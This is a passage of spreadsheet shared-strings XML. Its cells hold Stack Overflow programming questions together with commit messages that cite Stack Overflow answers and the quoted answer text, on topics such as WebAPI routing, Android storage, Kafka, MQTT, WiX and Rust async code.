    <t xml:space="preserve">Often when beginning a new project, I start out with what I believe to be the best of intentions in terms of how to structure the codebase. I love the idea of numerous small modules that do one thing well, are de-coupled from other parts of the codebase, and could potentially be reused by myself in other (similar) projects or open sourced for others to take advantage of.
However, come crunch week when I'm actually trying to get something into production, there's been more than one occasion where the complexity of managing all these different modules has proved too much of an overhead (despite good documentation and deploy methodology). On those times I've simply changed tack and bundled all the modules into one repository and managed it all as one codebase, meaning I can track everything together through different branches, deploying to staging and test environments, etc...
What are the advantages and disadvantages of these different approaches, and how do you manage working in one way or the other?
Advantages of one monolithic codebase:
Easy to deploy
Easy to rollback
Easy to branch/manage all changes together
No (or less) potentially complex dependencies to document and manage
Advantages of modular dependencies:
Reusability
Clean architecture (one module does one thing well)
</t>
  </si>
  <si>
    <t>C491</t>
  </si>
  <si>
    <t xml:space="preserve"> Fixed a bug where PUT, PATCH and DELETE operations would fail if th
e WebDav module was installed. http://stackoverflow.com/questions/12276316/mvc-4-iis-7-5-put-returning-405</t>
  </si>
  <si>
    <t>As I said above I'm using the WebAPI and it appears that the WebAPI is 'fussy' over which verbs map to which methods. I ended up having to add the [HttpXXX] attributes (HttpPut, Get, Delete and Post) to the appropriate methods to get the routing to work as I expected it to.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am new to developing for Android and in Kotlin. To learn, I try to build a simple audio recording application.&lt;/p&gt;
&lt;p&gt;For this, I'd like to copy some dummy audio wav files to the internal storage of my app (in the emulator), so that I can show all existing files in a list. Later on, these would be recordings made with the app.&lt;/p&gt;
&lt;p&gt;I copied a file named &amp;quot;original.wav&amp;quot; into the Download path of the emulated smartphone. I confirmed this using the file explorer of android studio.&lt;/p&gt;
&lt;p&gt;However, I tried many different things to copy this wav-file to the internal storage of my app to no avail. FOr some reason, the wav-file cannot be found by any call I tried.
E.g. I tried different variants of the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;val sourceUri = MediaStore.Audio.Media.getContentUri(MediaStore.VOLUME_EXTERNAL)
val projection = arrayOf(MediaStore.Audio.Media._ID)  // Verwendung von _ID fÃ¼r Audio
val selection = &amp;quot;${MediaStore.Audio.Media.DISPLAY_NAME} = ?&amp;quot;
val selectionArgs = arrayOf(&amp;quot;original.wav&amp;quot;)
val cursor = contentResolver.query(sourceUri, projection, selection, selectionArgs, null)
cursor?.use {
    if (it.moveToFirst()) {
        val id = it.getLong(it.getColumnIndexOrThrow(MediaStore.Audio.Media._ID))  // _ID fÃ¼r Audio
        val fileUri = Uri.withAppendedPath(sourceUri, id.toString())
        contentResolver.openInputStream(fileUri)?.use { inputStream -&amp;gt;
            FileOutputStream(destFile).use { outputStream -&amp;gt;
                inputStream.copyTo(outputStream)
            }
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But it.moveToFirst() is never true, i.e., no file is found. But the file is definitely there. I should have permission to read, as I added this to my Manifest:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;uses-permission android:name=&amp;quot;android.permission.READ_EXTERNAL_STORAGE&amp;quot;/&amp;gt;
&amp;lt;uses-permission android:name=&amp;quot;android.permission.WRITE_EXTERNAL_STORAGE&amp;quot;/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Could someone help me out? It cannot be difficult :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C492</t>
  </si>
  <si>
    <t xml:space="preserve"> fixed Controller Factory and updated Controller registration to wor
k with Areas as pointed out here:
http://stackoverflow.com/questions/5004744/castle-controllerfactory-samples-that-dont-work-with-mvc-areas</t>
  </si>
  <si>
    <t>Actually you're right. The existing implementation was OK in MVC 1 days before areas were introduced. Currently the
GetControllerInstance
method should be overriden to accommodate that. Feel free to fix it and submit a pull request.</t>
  </si>
  <si>
    <t xml:space="preserve">I am currently working on a project with which I need to program up a bit of a proof of concept app.  I have written PoC apps before but they have only been really small and haven't really had lots of layers where as the app I'm writing now has a:
Form layer - talks to data layer.
Data layer - talks to Database and Interop layer.
Interop Layer - talks to a COM object.
The COM object
What would be the best way to write a program to show that I can get from A to B and the process that is needed, without needing to invest a lot of time in writing the PoC.
I already have the idea in my head on how it should all go together but I'm having a bit of trouble showing my team mates what I mean.
Can anyone recommend any tips/tricks when coding up PoCs? Or would there be a better way to explain what I mean rather then having to write code.
</t>
  </si>
  <si>
    <t>C493</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to enforce two generic function parameters matching each other so they can be combined together. The enforcement seems to work but I can't seem to combine the values without an issue from the compiler.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function keys&amp;lt;T extends object&amp;gt;(obj: T) {
  return Object.keys(obj) as (keyof T)[];
}
function combineObjs&amp;lt;A extends object, B extends Record&amp;lt;keyof A, number&amp;gt;&amp;gt;(valsA: A, valsB: B) {
    // const aggr: Partial&amp;lt;T&amp;gt; = {}
    const aggr = { ...valsB }
    keys(valsA).forEach( key =&amp;gt; {
        // Operator '+' cannot be applied to types 'A[keyof A]' and 'B[keyof A]'.
        aggr[key] = valsA[key] + valsB[key]
    })
    return aggr // as Required&amp;lt;T&amp;gt;
}
const result = combineObjs({ foo: 1 }, { foo: 2 })
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C494</t>
  </si>
  <si>
    <t>Use Webflux for suspend controller functions
Suspend functions are not supported in Spring MVC see: https://stackoverflow.com/questions/55946638/spring-mvc-controller-coroutine-suspend-function-throws-illegalstateexception
For this reason use the webflux setup.</t>
  </si>
  <si>
    <t>Spring Framework 5.2 upcoming coroutines support only targets Spring WebFlux, not Spring MVC.</t>
  </si>
  <si>
    <t xml:space="preserve">We're about to embark on development of a new product. Our current product is a conventional client-server Windows Forms application written using VB.NET.
Is WPF ready for a business application?
From what I've seen, it seems like it's harder to develop a user interface with WPF than it is with Windows Forms. But I suppose speed comes with experience. I'm a little concerned that WPF might not catch on, though.
Should we stay with Windows Forms?
If we stay with Windows Forms, are we relegating ourselves to deprecation right out of the box?  I think it would be faster to market, but will Windows Forms still be around in five years?
Should we migrate away from Microsoft products?
All of our developers are .NET developers so migrating to another development environment might be out of the question.
I wish I had a crystal ball.
</t>
  </si>
  <si>
    <t>C495</t>
  </si>
  <si>
    <t>remoting not working as:
- WebSharper uses POST see http://websharper.com/docs/remoting
- SharePointContext does not allow POST see http://stackoverflow.com/questions/23828750/sharepoint-2013-mvc-5-provider-hosted-app-fails-to-authenticate-on-httppost-usi</t>
  </si>
  <si>
    <t>Above solution didn't work for me. I had the same problem with post, but for me it was the
return RedirectToAction("Index");
causing the error.
I changed it to:
return RedirectToAction("Index", new {SPHostUrl = SharePointContext.GetSPHostUrl(HttpContext.Request).AbsoluteUri});
and it worked.
I am not sure this is the solution for your problem as you are doing return view, but it may help someone :)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I display  &lt;code&gt;\n&lt;/code&gt;  as new line in text file or markdown file? I am on OSX using vscode&lt;/p&gt;
&lt;p&gt;from what I read in this &lt;a href="https://stackoverflow.com/questions/1446370/text-editor-which-shows-r-n"&gt;StackOverflow question&lt;/a&gt;
I understand that &lt;code&gt;\n&lt;/code&gt; should just display as new line in text editors?
I have a terminal output that have \n that I would like to replace as new lines so that when added to github the markdown content would render correctly&lt;/p&gt;
&lt;p&gt;the raw output I am saving to a text file is&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;\nsequenceDiagram\n    participant ABOUT_ME_APP as \&amp;quot;AboutMeApp\&amp;quot;\n    
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;after formatting it should look like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sequenceDiagram
participant Application as \&amp;quot;Application.java\&amp;quot; 
...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/5WdVGqHO.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/5WdVGqHO.png" alt="this is how I am manually replacing the \n" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I can get to work if I replace &lt;code&gt;\n&lt;/code&gt; with new line or even on windows laptop using notepad++ replace &lt;code&gt;\n&lt;/code&gt; with same &lt;code&gt;\n&lt;/code&gt; and it will display the newline correctly.&lt;/p&gt;
&lt;p&gt;My understanding is in the raw text file new line is stored as &lt;code&gt;\n&lt;/code&gt; or &lt;code&gt;\r\n&lt;/code&gt; internally anyway? and displays as new line when opened in text editor, is that correct?&lt;/p&gt;
&lt;p&gt;What am I missing? why is &lt;code&gt;\n&lt;/code&gt; not being displayed as newline when saved to a text file?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C496</t>
  </si>
  <si>
    <t xml:space="preserve">Anyone willing to help me out with pros/cons on .NET Remoting, Web Services, and WCF?  I have worked a bit with .NET Remoting and Web Services and I am architecting a new ASP.NET 3.5 web app where I will be using a SQL 2008 DB.  Primarily I am wondering if it would be worthwhile to really look into WCF for this app.
In this particular instance, here are some relevant points:
Most persistent data will be error and usage tracking.
Even if I go with .NET Remoting, traffic will not warrant a physical remoting server, but I'd like to dream that it one day will!
At this time, I do not foresee needing to grab this data from other web apps.
However, I'd still like to know:
When/why would you use .NET Remoting in a web app?
When/why would you use Web Services in a web app?
When/why would you use WCF in a web app?
Should I consider a technology such as LINQ to SQL?
Are there other better options are out there?
</t>
  </si>
  <si>
    <t>C497</t>
  </si>
  <si>
    <t>feat(simple-server.py): custom TCP server to enable reusing Gitzer effectively
Earlier when you closed the gitzer server and tried to run it again immediately, it didn't work since the server would still be bound to the port. This commit subclasses sockerserver.TCPServer and fixes that issue using a custom subclass.
Reference: https://stackoverflow.com/a/42147927/11667450</t>
  </si>
  <si>
    <t>Thanks to the other answers, I figured it out.
allow_reuse_address
should be on the class, not on the instance:
SocketServer.TCPServer.allow_reuse_address = True
httpd = SocketServer.TCPServer(("", PORT), MyRequestHandler)
I'm still not sure why closing the socket didn't free it up for the next run of the server, though.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to use &lt;code&gt;std::is_invocable&lt;/code&gt; to test whether a template parameter type has a member function called &lt;code&gt;serialise_deserialise()&lt;/code&gt;:&lt;/p&gt;
&lt;pre class="lang-cpp prettyprint-override"&gt;&lt;code&gt;template &amp;lt;bool bIsInSerialiseMode&amp;gt;
struct serialiser_deserialiser
{
    template &amp;lt;typename U&amp;gt;
    void read_or_write(U&amp;amp; obj_to_write)
    {
        constexpr bool bDoesTypeHaveSerialiseDeserialiseFunction = std::is_invocable_v&amp;lt;decltype(&amp;amp;U::serialise_deserialise), serialiser_deserialiser&amp;gt;;
        //static_assert (bDoesTypeHaveSerialiseDeserialiseFunction);
        if constexpr (bDoesTypeHaveSerialiseDeserialiseFunction) 
        /* SOMETHING*/;
        else ; 
    }
};
struct MySerializableType
{
    template &amp;lt;typename serialiser_t&amp;gt;
    void serialise_deserialise(serialiser_t&amp;amp; serialiser_deserialiser)
    { // MY TYPE HAS THIS FUNCTION SO I WAS HOPING IT WOULD BE RECOGNIZED
    }
};
int main() {
    serialiser_deserialiser&amp;lt;true&amp;gt; serialiser_obj;
    MySerializableType serializable_type;
    serialiser_obj.read_or_write(serializable_type);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The error message is:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;'MySerializableType::serialise_deserialise': incorrect argument to 'decltype'&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So, I changed that line that checks if the function exists to:&lt;/p&gt;
&lt;pre class="lang-cpp prettyprint-override"&gt;&lt;code&gt;std::is_invocable_v&amp;lt;decltype(&amp;amp;U::template serialise_deserialise&amp;lt;serialiser_deserialiser&amp;gt;), serialiser_deserialiser&amp;gt;;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It says &lt;code&gt;static_assert&lt;/code&gt; failed.&lt;/p&gt;
&lt;p&gt;It's supposed to be a templated function called &lt;code&gt;serialise_deserialise&lt;/code&gt; that's callable with a &lt;code&gt;serialiser_deserialiser&lt;/code&gt; as an argument. Though the specific argument shouldn't matter because it's templated, and therefore should be able to receive any argument. I tried with an &lt;code&gt;int&lt;/code&gt;:&lt;/p&gt;
&lt;pre class="lang-cpp prettyprint-override"&gt;&lt;code&gt;std::is_invocable_v&amp;lt;decltype(&amp;amp;U::template serialise_deserialise&amp;lt;serialiser_deserialiser&amp;gt;), int&amp;gt;;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But the same error, &lt;code&gt;static_assert&lt;/code&gt; failed.&lt;/p&gt;
&lt;p&gt;Why is it not recognizing that &lt;code&gt;U::&lt;/code&gt; has a function called &lt;code&gt;serialise_deserialise&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;Here is the &lt;a href="https://godbolt.org/#z:OYLghAFBqd5QCxAYwPYBMCmBRdBLAF1QCcAaPECAMzwBtMA7AQwFtMQByARg9KtQYEAysib0QXACx8BBAKoBnTAAUAHpwAMvAFYTStJg1DIApACYAQuYukl9ZATwDKjdAGFUtAK4sGIM6SuADJ4DJgAcj4ARpjEIADMAGykAA6oCoRODB7evv6p6ZkCIWGRLDFxSbaY9o4CQgRMxAQ5Pn4BdpgOWQ1NBCUR0bEJyQqNza15HeP9oYPlw0kAlLaoXsTI7BwEmCwpBjsA1CbxblGonodRAJIK1wxCsXhieEoAshiYJ9gmGgCCY2IXgchyUxGetFesQA%2BlgwRCocRfn8TAB2Kz/X4ATh2ewOmGOpwIAE8UoxWAS5N9kdiAG6oPDoQ7ETBMdDQkjQgDu4J2ECpZkSh1QUW00KI3N5mCWNI0WLRGJRmLl2LQDDGmFUKWIVwutCuABFUJgFAAVUmYAASTFpmEe4JeSgNJqejswADEvAxugJCQbQQR0CAQK9oaF6aIovRobSTm4sMhaCSyRBzIk5MHcfsmEd4W7YS6HZClHG88WYXDXeWkfFsCtQVXEQWy4jqfFFbL5XKxjm8MhoUwFGCCIcIFEjSbzWTrbb7QinYX5x6vT6GDL27KlV2u1u0Qaaaj9xvlUqAQQgSC3sS5y8AF5MKOYKdfTHoztZ/GEtzJ8lsBtFpsCGpZUsXpRl/yXZtGyUCAWzBcU0wgt1iCggCwRlECFU3bE9wPI8OxPTdQhHFgmFCCAlmON9CJAuCK0XZC43PLwvlrJDqw5UUTgIrErxvSF70fZ92LwQTox/bjOzolCRW0AA6Fk2Q5FCeUITBYMbMTMHFC11wIlFDw4FZaE4ABWXg/A4LRSFQTg3GsaxQTWDYCXMeIeFIAhNCMlYAGsEniOT4mCkLQtC5ITI4SQLO8mzOF4BQQA0TzvJWOBYCQNA9joWJyEoLKUhyuJE0MYBxSBBhfL4OgdmIRKx1iqJQiaYlOA8prmGIYkAHlRS6LzuF4LK2EEbqGFoVqrN4LAoi8YA3DEWhEsG0gsFIoxxCm1a8BZbpbWW6zNS6Lwdja3hiJqWLISiYgWo8LBYvPPAWDO0hbWIc4F3W4BISMVK%2BAMYAFAANTwTAuW6slLI8/hBBEMR2CkGRBEUFR1C23QuH0UqUAcyx9DwKJEsgFZUBSOp1Ximz3vBOF4BWTpVxcBh3E8No9GCOYygqPQ0gyCnJj8LG%2BaKBgBm54YscZinegmNm8ilmp%2Bp6GZxaGOIpZmQW9B7Zo1YWDWGeczYJGMsyYq22yOEOVQAA5EgAWkSSRDhKoxR2YyrKIgXBCBIY4zHcpZeAGrQlj8hIuDk0zBVM1FUUSeJba4MxTK4Uzbf0ThotISzrKthKkpSqa0pgRAQDWAgUhOvKIAKorwgpTg7cd53DmAZBkEOKQ5LMXhMHwIhab0WHhFEcQkdH1G1FizHSB5JgUjOs2OHM3PYqt7qTurkdUCoG37adl23eAD2Kt872PGy%2BgdTcrhg%2BLsOI/iUy5KkDQNFtrENDMW3TMkKQWIIrZwtvnKmiVkqhx8lnDgfd16WyplA8Ob1YgZGcJIIAA%3D" rel="nofollow noreferrer"&gt;link on Godbolt&lt;/a&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C498</t>
  </si>
  <si>
    <t>Fixed ConsumerCoordinatorNotAvailableCode when send ConsumerMetadataR
equest
&gt; The offsets for a given consumer group are maintained by a specific broker called the offset coordinator. i.e., a consumer needs to issue its offset commit and fetch requests to this specific broker. It can discover the current offset coordinator by issuing a consumer metadata request.
&gt; The broker returns this error code for consumer metadata requests or offset commit requests if the offsets topic has not yet been created.
See
* [Kafka Error Codes](https://cwiki.apache.org/confluence/display/KAFKA/A+Guide+To+The+Kafka+Protocol#AGuideToTheKafkaProtocol-ErrorCodes)
* [issue on StackOverflow](http://stackoverflow.com/questions/28513744/kafka-0-8-2-consumermetadatarequest-always-return-consumercoordinatornotavailabl)</t>
  </si>
  <si>
    <t>I've just found a similar problem. The issue is that the consumer has not issued a ConsumerMetadataRequest for the consumer group.
What I've found is that you have to send a ConsumerMetadataRequest and retry with back off if you receive a ConsumerCoordinatorNotAvailableCode returned as an error.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm attempting to refactor some moderately complex existing .NET code to be usable in Silverlight.  The core issue is that all Silverlight web services calls must be asynch, and the existing code was implemented in a fairly typical synchronous manner.
Existing call stack for a typical operation might be something like this:
Page -&gt; GetPersonMethod -&gt; PersonBusinessObject -&gt; PersonDataObject -&gt; CallWebservice -&gt; (bubble response back up the stack)
My thought is to split all the methods into separate Request and Response methods and preserve the overall structure of the application.
The new call stack for the same operation would then be like this:
Page -&gt; GetPersonRequest -&gt; PersonBusinessRequest -&gt; PersonDataRequest -&gt; WebserviceRequest 
Page &lt;- GetPersonResponse &lt;- PersonBusinessResponse &lt;- PersonDataResponse &lt;- WebserviceResponse
Core questions:
Is this a terrible idea, and should I really just rewrite it from the ground up with a more asynch perspective?
Assuming I take this approach how do I preserve the call stack for my nested responses?
TIA-
-Eric
</t>
  </si>
  <si>
    <t>C499</t>
  </si>
  <si>
    <t>subscribe on (re)connect
https://stackoverflow.com/questions/59783319/paho-mqtt-client-disconnected-and-no-more-message-incoming-after-reconnection
solves problem when client disconnects with broker and automaticly reconnects, need to subscribe to topic on on_connect not on initialization</t>
  </si>
  <si>
    <t>I've a Rspi with MQTT Paho Client on it
I've implemented
on_connect() ...
on_diconnect() ...
mqtt_service() to subscribe topic, establish broker connection and do a loop.start and a while1
        client.loop_start()    
    # client.loop_forever()                 19/12/19 Du coup si on veux lire les Inputs fo fair un loop
    print("&gt; client.connected_flag= ", client.connected_flag, ".")
    print("&gt; client.bad_connection_flag= ", client.bad_connection_flag, ".")
    while not client.connected_flag and not client.bad_connection_flag:                             #wait coonnection to broker .. usefull ??
        Print_savelog("[mqtt_service]: In wait loop to connect")
        time.sleep(1)
        Print_savelog('[mqtt_service]: client.connected_flag = ', client.connected_flag)
        Print_savelog('[mqtt_service]: client.bad_connection_flag = ', client.bad_connection_flag)
    if client.bad_connection_flag:                                                                  # 20/12/19 PEUT etre là que ca ne reconnecte pas suite à coupure de jus et pas encore internet
        Print_savelog("[mqtt_service]: aaa")
        client.loop_stop()    #Stop loop
        sys.exit()
    while 1:
        if (rx_en_crs==0):
            print("In the MQTT LOOP")
            toto.chk_position()
        #Print_savelog('&gt; position [chk_position]2 = ', var.position_en_crs)
        #print("&gt;2 var.position_ancienne = ", var.position_ancienne, ".")
        #print("&gt;2 var.position_en_crs   = ", var.position_en_crs, ".")
            if ( (client.connected_flag == False) and (client.bad_connection_flag == True) ):
                Print_savelog('[mqtt_service]: into connected_flag=false &amp; bad_connection_flag=true')
            if (var.position_ancienne!=var.position_en_crs ):
                Print_savelog('[mqtt_service]: &gt; PUBLISHING position = ', var.position_en_crs)
                client.publish("mo/portail/position_portail",var.position_en_crs,1, True)
                var.position_ancienne=var.position_en_crs 
            time.sleep(1)      
        else:
            rx_en_crs=rx_en_crs
Sometimes there's some disconnection [on_disconnect] for reason 1 ?? (i don't know why...)
The client succeed to do a reconnection [on_connect] with result 0.
But after that it's impossible to receive any incoming Topic.
do i need to restart manually the loop ?? because the reconnection is automatic but not the loop??
Any idea?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have multiple projects in solution file - Proj1, Proj2, Proj3, Proj4....
The projects have cross references. Proj1 and Proj2 have references to Proj4. Proj4 has reference to Proj3 and so on. They are all compiled against .Net Framework 4.6.2+. Now I am trying to use WiX v5 to build MSI.Instead of manually referencing the dll generated in bin of each of these projects in components.wxs, I am try to use Heat to Harvest them. So I have tried Heat's HarvestDirectory. But end up getting below error -
error WIX00091: Duplicate File with Identifier &amp;quot;xxxxx&amp;quot; found. Access Modifiers (global, library, file, section) cannot prevent these conflicts. Ensure all your idenifiers of a given type are unique.&lt;/p&gt;
&lt;p&gt;The bin folders of projects that have the same shared referenced dlls. Ideally we only the proj1.dll and proj2.dll and their dependencies not the referenced dlls from proj4 which needs to be harvested from bin of proj4. How do I achieve this using WiX and Heat. I am trying to avoid adding files manually.&lt;/p&gt;
&lt;p&gt;My current wixproj looks something like this -&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Project Sdk=&amp;quot;WixToolset.Sdk/5.0.2&amp;quot;&amp;gt;
  &amp;lt;PropertyGroup&amp;gt;
    &amp;lt;!--&amp;lt;EnableProjectHarvesting&amp;gt;true&amp;lt;/EnableProjectHarvesting&amp;gt;--&amp;gt;
    &amp;lt;!--&amp;lt;HarvestProjectsSuppressUniqueIds&amp;gt;true&amp;lt;/HarvestProjectsSuppressUniqueIds&amp;gt;--&amp;gt;
  &amp;lt;/PropertyGroup&amp;gt;
  &amp;lt;ItemGroup&amp;gt;
    &amp;lt;PackageReference Include=&amp;quot;WixToolset.Heat&amp;quot; Version=&amp;quot;5.0.2&amp;quot; /&amp;gt;
  &amp;lt;/ItemGroup&amp;gt;
  &amp;lt;ItemGroup&amp;gt;
   &amp;lt;HarvestDirectory Include=&amp;quot;../FolderA/ADOMD_Driver/bin/Release&amp;quot;&amp;gt;
      &amp;lt;ComponentGroupName&amp;gt;AdomdComponents&amp;lt;/ComponentGroupName&amp;gt;
      &amp;lt;DirectoryRefId&amp;gt;BinFolder&amp;lt;/DirectoryRefId&amp;gt;
     &amp;lt;SuppressRegistry&amp;gt;true&amp;lt;/SuppressRegistry&amp;gt;
     &amp;lt;SuppressRootDirectory&amp;gt;true&amp;lt;/SuppressRootDirectory&amp;gt;
     &amp;lt;HarvestDirectoryTransforms&amp;gt;&amp;quot;Filter.xslt&amp;quot;&amp;lt;/HarvestDirectoryTransforms&amp;gt;
    &amp;lt;/HarvestDirectory&amp;gt;
    &amp;lt;HarvestDirectory Include=&amp;quot;../FolderA/DataDirect_Driver/bin/Release&amp;quot;&amp;gt;
      &amp;lt;ComponentGroupName&amp;gt;DataDirectComponents&amp;lt;/ComponentGroupName&amp;gt;
      &amp;lt;DirectoryRefId&amp;gt;BinFolder&amp;lt;/DirectoryRefId&amp;gt;
      &amp;lt;SuppressRegistry&amp;gt;true&amp;lt;/SuppressRegistry&amp;gt;
      &amp;lt;SuppressRootDirectory&amp;gt;true&amp;lt;/SuppressRootDirectory&amp;gt;
      &amp;lt;HarvestDirectoryTransforms&amp;gt;&amp;quot;Filter.xslt&amp;quot;&amp;lt;/HarvestDirectoryTransforms&amp;gt;
    &amp;lt;/HarvestDirectory&amp;gt;
    &amp;lt;!--&amp;lt;HarvestProject Include=&amp;quot;..\FolderA\ADOMD_Driver\ADOMD_Driver.csproj&amp;quot; ProjectOutputGroups=&amp;quot;Binaries;Content;&amp;quot; /&amp;gt;--&amp;gt;
  &amp;lt;/ItemGroup&amp;gt;
  &amp;lt;ItemGroup&amp;gt;
    &amp;lt;ProjectReference Include=&amp;quot;..\FolderA\ADOMD_Driver\ADOMD_Driver.csproj&amp;quot; DoNotHarvest=&amp;quot;true&amp;quot; /&amp;gt;
    &amp;lt;ProjectReference Include=&amp;quot;..\FolderA\DataDirect_Driver\DataDirect_Driver.csproj&amp;quot; DoNotHarvest=&amp;quot;true&amp;quot;  /&amp;gt;
    &amp;lt;ProjectReference Include=&amp;quot;..\FolderA\DB2_Driver\DB2_Driver.csproj&amp;quot; DoNotHarvest=&amp;quot;true&amp;quot; /&amp;gt;
    &amp;lt;ProjectReference Include=&amp;quot;..\FolderA\DDDB2_Driver\DDDB2_Driver.csproj&amp;quot; DoNotHarvest=&amp;quot;true&amp;quot;  /&amp;gt;
    &amp;lt;ProjectReference Include=&amp;quot;..\Configuration\Configuration.csproj&amp;quot; DoNotHarvest=&amp;quot;true&amp;quot; /&amp;gt;
    &amp;lt;ProjectReference Include=&amp;quot;..\Core\Core.csproj&amp;quot; DoNotHarvest=&amp;quot;true&amp;quot; /&amp;gt;
    &amp;lt;ProjectReference Include=&amp;quot;..\Encrypter\Encrypter.csproj&amp;quot; DoNotHarvest=&amp;quot;true&amp;quot; /&amp;gt;
    &amp;lt;ProjectReference Include=&amp;quot;..\RoleParser\RoleParser.csproj&amp;quot; DoNotHarvest=&amp;quot;true&amp;quot; /&amp;gt;
    &amp;lt;ProjectReference Include=&amp;quot;..\ServerCore\Server.csproj&amp;quot; DoNotHarvest=&amp;quot;true&amp;quot; /&amp;gt;
    &amp;lt;ProjectReference Include=&amp;quot;..\SmartThreadPool\SmartThreadPool.csproj&amp;quot; DoNotHarvest=&amp;quot;true&amp;quot; /&amp;gt;
    &amp;lt;ProjectReference Include=&amp;quot;..\ProductHealthCheck\ProductHealthCheck.csproj&amp;quot; DoNotHarvest=&amp;quot;true&amp;quot; /&amp;gt;
    &amp;lt;ProjectReference Include=&amp;quot;..\ProductServiceWrite\ProductServiceWrite.csproj&amp;quot; DoNotHarvest=&amp;quot;true&amp;quot; /&amp;gt;
    &amp;lt;ProjectReference Include=&amp;quot;..\ProductService\ProductService.csproj&amp;quot; DoNotHarvest=&amp;quot;true&amp;quot; /&amp;gt;
    &amp;lt;ProjectReference Include=&amp;quot;..\ProductWCFService\ProductWCFService.csproj&amp;quot; DoNotHarvest=&amp;quot;true&amp;quot; /&amp;gt;
  &amp;lt;/ItemGroup&amp;gt;
&amp;lt;/Project&amp;gt; 
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C5</t>
  </si>
  <si>
    <t>Improve rendering performance with memos
The javascript threads remain consistently higher (almost always above
50 and usually right at or just below 60) after this change.
I sympathize with this SO answer:
https://stackoverflow.com/a/63405621/1137752</t>
  </si>
  <si>
    <t>You should always use React.memo LITERALLY, as comparing the tree returned by the Component is always more expensive than comparing a pair of props properties
So don't listen to anyone and wrap ALL functional components in React.memo. React.memo was originally intended to be built into the core of functional components, but it is not used by default due to the loss of backward compatibility. (Since it compares the object superficially, and you MAYBE are using the nested properties of the sub-object in the component) =)
That's it, this is the ONLY REASON why React doesn't use memo Automatically. =)
In fact, they could make version 17.0.0, which would BREAK backward compatibility, and make React.memo the default, and make some kind of function to cancel this behavior, for example React.deepProps =)
Stop listening to theorists, guys =) The rule is simple:
If your component uses DEEP COMPARING PROPS then don't use memo, otherwise ALWAYS use it, comparing TWO OBJECTS is ALWAYS CHEAPER than calling React.createElement() and comparing two trees, creating FiberNodes, and so on.
Theorists talk about what they themselves do not know, they have not analyzed the react code, they do not understand FRP and they do not understand what they're advising =)
P.S. if your component is using children prop, React.memo will not work, because children prop always makes a new array. But It is better not to bother about this, and even such components should ALSO be wrapped in React.memo, since the computing resources are negligible.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to use the circuit breaker pattern within my application. I chose to use the &lt;code&gt;failsafe&lt;/code&gt; Rust crate. However, I do not understand how to execute an async function. I could not find any examples, and I am new to Rust. Any help would be greatly appreciated.&lt;/p&gt;
&lt;p&gt;This is what I have right now.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;use failsafe::futures::CircuitBreaker;
use failsafe::{Config, Error, FailurePolicy, Instrument, StateMachine};
use crate::error;
#[derive(Clone)]
pub struct ConnectionBreaker&amp;lt;P, I&amp;gt;
where
    P: FailurePolicy,
    I: Instrument
{
    inner: StateMachine&amp;lt;P, I&amp;gt;,
}
impl&amp;lt;P, I&amp;gt; ConnectionBreaker&amp;lt;P, I&amp;gt;
where
    P: FailurePolicy,
    I: Instrument
{
    pub fn new(policy: P, instrument: I) -&amp;gt; Self {
        Self {
            inner: Config::new().failure_policy(policy).instrument(instrument).build(),
        }
    }
    pub async fn execute&amp;lt;F, T, Fut&amp;gt;(&amp;amp;self, f: F) -&amp;gt; error::Result&amp;lt;T&amp;gt;
    where
        F: FnOnce() -&amp;gt; Fut + Send + 'static,
        Fut: Future&amp;lt;Output = error::Result&amp;lt;T&amp;gt;&amp;gt; + Send,
        T: Send + 'static,
    {
        self.inner.call(f).await.map_err(|e| match e {
            Error::Inner(e) =&amp;gt; e,
            Error::Rejected =&amp;gt; error::AppError::CircuitBreakerOpen,
        })
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The IDE shows the following error on the &lt;code&gt;call&lt;/code&gt; function:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;the method `call` exists for struct `StateMachine&amp;lt;P, I&amp;gt;`, but its trait bounds were not satisfied [E0599] method cannot be called on `StateMachine&amp;lt;P, I&amp;gt;` due to unsatisfied trait bounds Note: the following trait bounds were not satisfied: `P: Send` which is required by `StateMachine&amp;lt;P, I&amp;gt;: failsafe::futures::CircuitBreaker` `P: Sync` which is required by `StateMachine&amp;lt;P, I&amp;gt;: failsafe::futures::CircuitBreaker` `I: Send` which is required by `StateMachine&amp;lt;P, I&amp;gt;: failsafe::futures::CircuitBreaker` `I: Sync` which is required by `StateMachine&amp;lt;P, I&amp;gt;: failsafe::futures::CircuitBreaker` Help: items from traits can only be used if the trait is in scope
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C50</t>
  </si>
  <si>
